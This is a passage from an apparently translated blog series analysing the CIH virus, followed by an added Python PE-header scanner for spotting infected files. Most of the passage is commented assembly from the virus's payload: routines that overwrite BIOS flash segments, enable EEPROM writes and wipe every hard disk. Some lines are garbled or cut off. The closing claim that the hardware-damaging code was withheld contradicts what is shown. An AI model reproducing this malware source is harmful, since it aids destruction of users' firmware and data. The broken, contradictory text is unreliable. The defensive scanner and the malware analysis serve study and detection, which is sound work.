
Analysis of virus program source code examples-CIH virus[5]

黄舟 (Original)
2017-01-17 11:21:47


push ecx
loop $

; Destroy the additional 000E0000 - 000E007F ROM data segment of the BIOS, 80h bytes in total
xor ah, ah
mov [eax], al

xchg ecx, eax
loop $
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

; Destroy the 000FE000 - 000FE07F data segment of the BIOS, 80h bytes in total
mov ah, 0e0h
mov [eax], al
[esi], 100ch
call esi
; Destroy all hard disks
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
push ecx
push ecx

mov esi, esp
sub esp, 0ach

LoopOfKillHardDisk:
int 20h
dd 00100004h

cmp word ptr [esi+06h], 0017h
je KillNextDataSection

ChangeNextHardDisk:
inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk

; Destroy the next area
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber

jmp LoopOfKillHardDisk
 
; Enable writing to the EEPROM
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx

BooleanCalculateCode = $
or al, 44h

ret
BCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath ; Address difference between successive Vxd call instructions

VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ; Vxd call IDs
VxdCallTableSize = ($-VxdCallIDTable)/04h ; Number of Vxd calls used by the program
 
; Definition of virus version and copyright information
VirusVersionCopyright db 'CIH v' ; Identification of the CIH virus
db MajorVirusVersion+'0' ; Major version number
db '.'
db MinorVirusVersion+'0' ; Minor version number
db ' TATUNG' ; Author name

; Virus size
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
  + NumberOfSections*SizeOfVirusCodeSectionTable(08h)
  + SizeOfTheFirstVirusCodeSectionTable(04h)

; Dynamic data definition
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; Virus data starting address

OnBusy db 0 ; "Busy" flag
FileModificationTime dd ? ; File modification time
FileNameBufferSize dup(?)
DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; Number of sections
TimeDateStamp dd ? ; File time
SymbolsPointer dd ?
NumberOfSymbols dd ? ; Number of symbols in the symbol table
SizeOfOptionalHeader dw ? ; Length of the optional header
_Characteristics dw ? ; Characteristics flags
Magic dw ? ; Magic word (always 010bh)
LinkerVersion dw ? ; Linker version number
SizeOfCode dd ? ; Code section size
SizeOfInitializedData dd ? ; Initialized data size
SizeOfUninitializedData dd ? ; Uninitialized data size
AddressOfEntryPoint dd ? ; Program entry point RVA
BaseOfCode dd ? ; Code section start RVA
BaseOfData dd ? ; Data section start RVA
ImageBase dd ? ; Load base address

@9 = $
SectionAlignment dd ? ; Section alignment
FileAlignment dd ? ; File alignment
OperatingSystemVersion dd ? ; Required operating system version number
ImageVersion dd ? ; User-defined version number
SubsystemVersion dd ? ; Required subsystem version number
Reserved dd ? ; Reserved
SizeOfImage dd ? ; Total length of the image
SizeOfHeaders dd ? ; File header size
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = @9
SectionName = StartOfSectionTable ; Section name
VirtualSize = StartOfSectionTable+08h ; Real length of the section
VirtualAddress = StartOfSectionTable+0ch ; Section RVA
SizeOfRawData = StartOfSectionTable+10h ; Physical length of the section
PointerToRawData = StartOfSectionTable+14h ; Physical file offset of the section
PointerToRelocations = StartOfSectionTable+18h ; Relocation table offset
PointerToLineNumbers = StartOfSectionTable+1ch ; Line number table offset
NumberOfRelocations = StartOfSectionTable+20h ; Number of relocation entries
NumberOfLineNumbers = StartOfSectionTable+22h ; Number of line number entries
Characteristics = StartOfSectionTable+24h ; Section attributes
SizeOfSectionTable = Characteristics+04h-SectionName ; Length of one section table entry

; Amount of memory required by the virus
VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
 ; + NumberOfSections(??)*SizeOfSectionTable(28h)
 ; + SizeOfVirusCodeSectionTableEndMark(04h)
 ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)

From the above code analysis we can see that the CIH virus has a clear structure and distinct layers. The backbone of this virus program is very similar to that of a DOS virus; only the details are handled the Windows 95 way, and all system calls are made through Vxd services. This makes the virus program more low-level, more efficient and easier to write. Compared with calling Windows API functions, there is no need to deal with the virus's own complex relocation; compared with using interrupts, it better resists tracing and analysis of the program.

The CIH virus has two innovations. First, when infecting, the virus searches for the blank areas between the sections of the target file and writes its own data structures and code into them (if the blank area is too small, the file is not infected, which is one reason why some files are never infected). Second, when it triggers, the virus can damage the computer hardware: it not only burns the Flash Memory but also destroys the hard disk.
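The header fields listed above (NumberOfSections through SizeOfHeaders, then the 28h-byte section table entries) are exactly what a defender needs to read to spot the first innovation from the file side. The following Python is an added example for this page, not code from the article or from the virus source: it parses a PE32 file at the same offsets the data definitions above describe, measures the slack between each section's VirtualSize and its SizeOfRawData (the "blank area" the text refers to), and checks whether AddressOfEntryPoint still lands inside a section's real contents. A linker leaves that slack zero-filled, so non-zero bytes there, or an entry point outside every section body, is a cheap triage signal. The two sample images (`CLEAN`, `SUSPECT`) are constructed in-memory for the demonstration; `build_sample` and all field names are this example's own.

```python
import struct

SECTION_HEADER_SIZE = 0x28     # one section table entry, the page's SizeOfSectionTable (28h)
OPTIONAL_HEADER_PE32 = 0x10B   # Magic value the page notes is "always 010bh"


def parse_pe(data: bytes) -> dict:
    """Parse the COFF header, the first 0x40 bytes of the PE32 optional header
    (Magic .. SizeOfHeaders, the span the page reads) and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (num_sections, time_date_stamp, _sym_ptr, _num_syms,
     size_opt_hdr, characteristics) = struct.unpack_from("<HIIIHH", data, coff + 2)
    opt = coff + 20
    f = struct.unpack_from("<HH" + "I" * 15, data, opt)   # Magic, LinkerVersion, then 15 dwords
    if f[0] != OPTIONAL_HEADER_PE32:
        raise ValueError("only PE32 (Magic 010bh) is handled, got %#x" % f[0])
    sections = []
    table = opt + size_opt_hdr
    for i in range(num_sections):
        (name, vsize, vaddr, raw_size, raw_ptr, _rel, _lin, _nrel, _nlin, flags) = \
            struct.unpack_from("<8sIIIIIIHHI", data, table + i * SECTION_HEADER_SIZE)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "flags": flags})
    return {"num_sections": num_sections, "time_date_stamp": time_date_stamp,
            "characteristics": characteristics, "entry_point": f[5],
            "section_align": f[9], "file_align": f[10], "size_of_image": f[15],
            "size_of_headers": f[16], "sections": sections}


def section_slack(pe: dict, data: bytes) -> list:
    """(name, file_offset, length, non_zero_bytes) for the padding between the end
    of each section's real contents (VirtualSize) and its raw block (SizeOfRawData)."""
    out = []
    for s in pe["sections"]:
        if s["raw_size"] > s["vsize"]:
            start, length = s["raw_ptr"] + s["vsize"], s["raw_size"] - s["vsize"]
            chunk = data[start:start + length]
            out.append((s["name"], start, length, sum(1 for b in chunk if b)))
    return out


def entry_section(pe: dict):
    """Section whose virtual extent contains the entry point, or None if the
    entry point lies outside every section's real contents."""
    ep = pe["entry_point"]
    for s in pe["sections"]:
        if s["vaddr"] <= ep < s["vaddr"] + s["vsize"]:
            return s["name"]
    return None


def scan(data: bytes) -> dict:
    pe = parse_pe(data)
    slack_nonzero = sum(n for _, _, _, n in section_slack(pe, data))
    sect = entry_section(pe)
    return {"slack_nonzero": slack_nonzero, "entry_section": sect,
            "suspicious": slack_nonzero > 0 or sect is None}


def build_sample(entry_rva: int, slack_payload: bytes = b"") -> bytes:
    """Constructed one-section PE32 image: 0x200 bytes of headers, then .text with
    0x40 bytes of real code inside a 0x200-byte raw block (0x1C0 bytes of slack)."""
    file_align, sect_align, raw_size = 0x200, 0x1000, 0x200
    code = b"\xC3" * 0x40                           # constructed: 64 x `ret`
    assert len(slack_payload) <= raw_size - len(code)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HH" + "I" * 15, OPTIONAL_HEADER_PE32, 0x0E, raw_size, 0, 0,
                      entry_rva, 0x1000, 0x2000, 0x400000, sect_align, file_align,
                      4, 0, 4, 0, 0x2000, file_align)
    opt += bytes(0xE0 - len(opt))                   # remaining optional-header fields zeroed
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, raw_size,
                       0x200, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + coff + opt + sect
    headers += bytes(file_align - len(headers))
    body = code + slack_payload
    return headers + body + bytes(raw_size - len(body))


CLEAN = build_sample(entry_rva=0x1000)
# constructed: 0x30 bytes written into the .text slack and the entry point redirected
# to them, the file layout the text above describes for an infected program
SUSPECT = build_sample(entry_rva=0x1040, slack_payload=b"\x90" * 0x30)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, scan(img))
```

On real binaries, treat the slack count as a triage hint rather than a verdict: some linkers and packers do leave non-zero padding, and files with VirtualSize larger than SizeOfRawData (uninitialised data) simply report no slack. The entry point check is the stronger of the two, since legitimate tools never point the entry at bytes outside a section's declared contents.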

For security reasons, we have not given a detailed analysis of the part of the code that triggers the virus and damages the hardware.
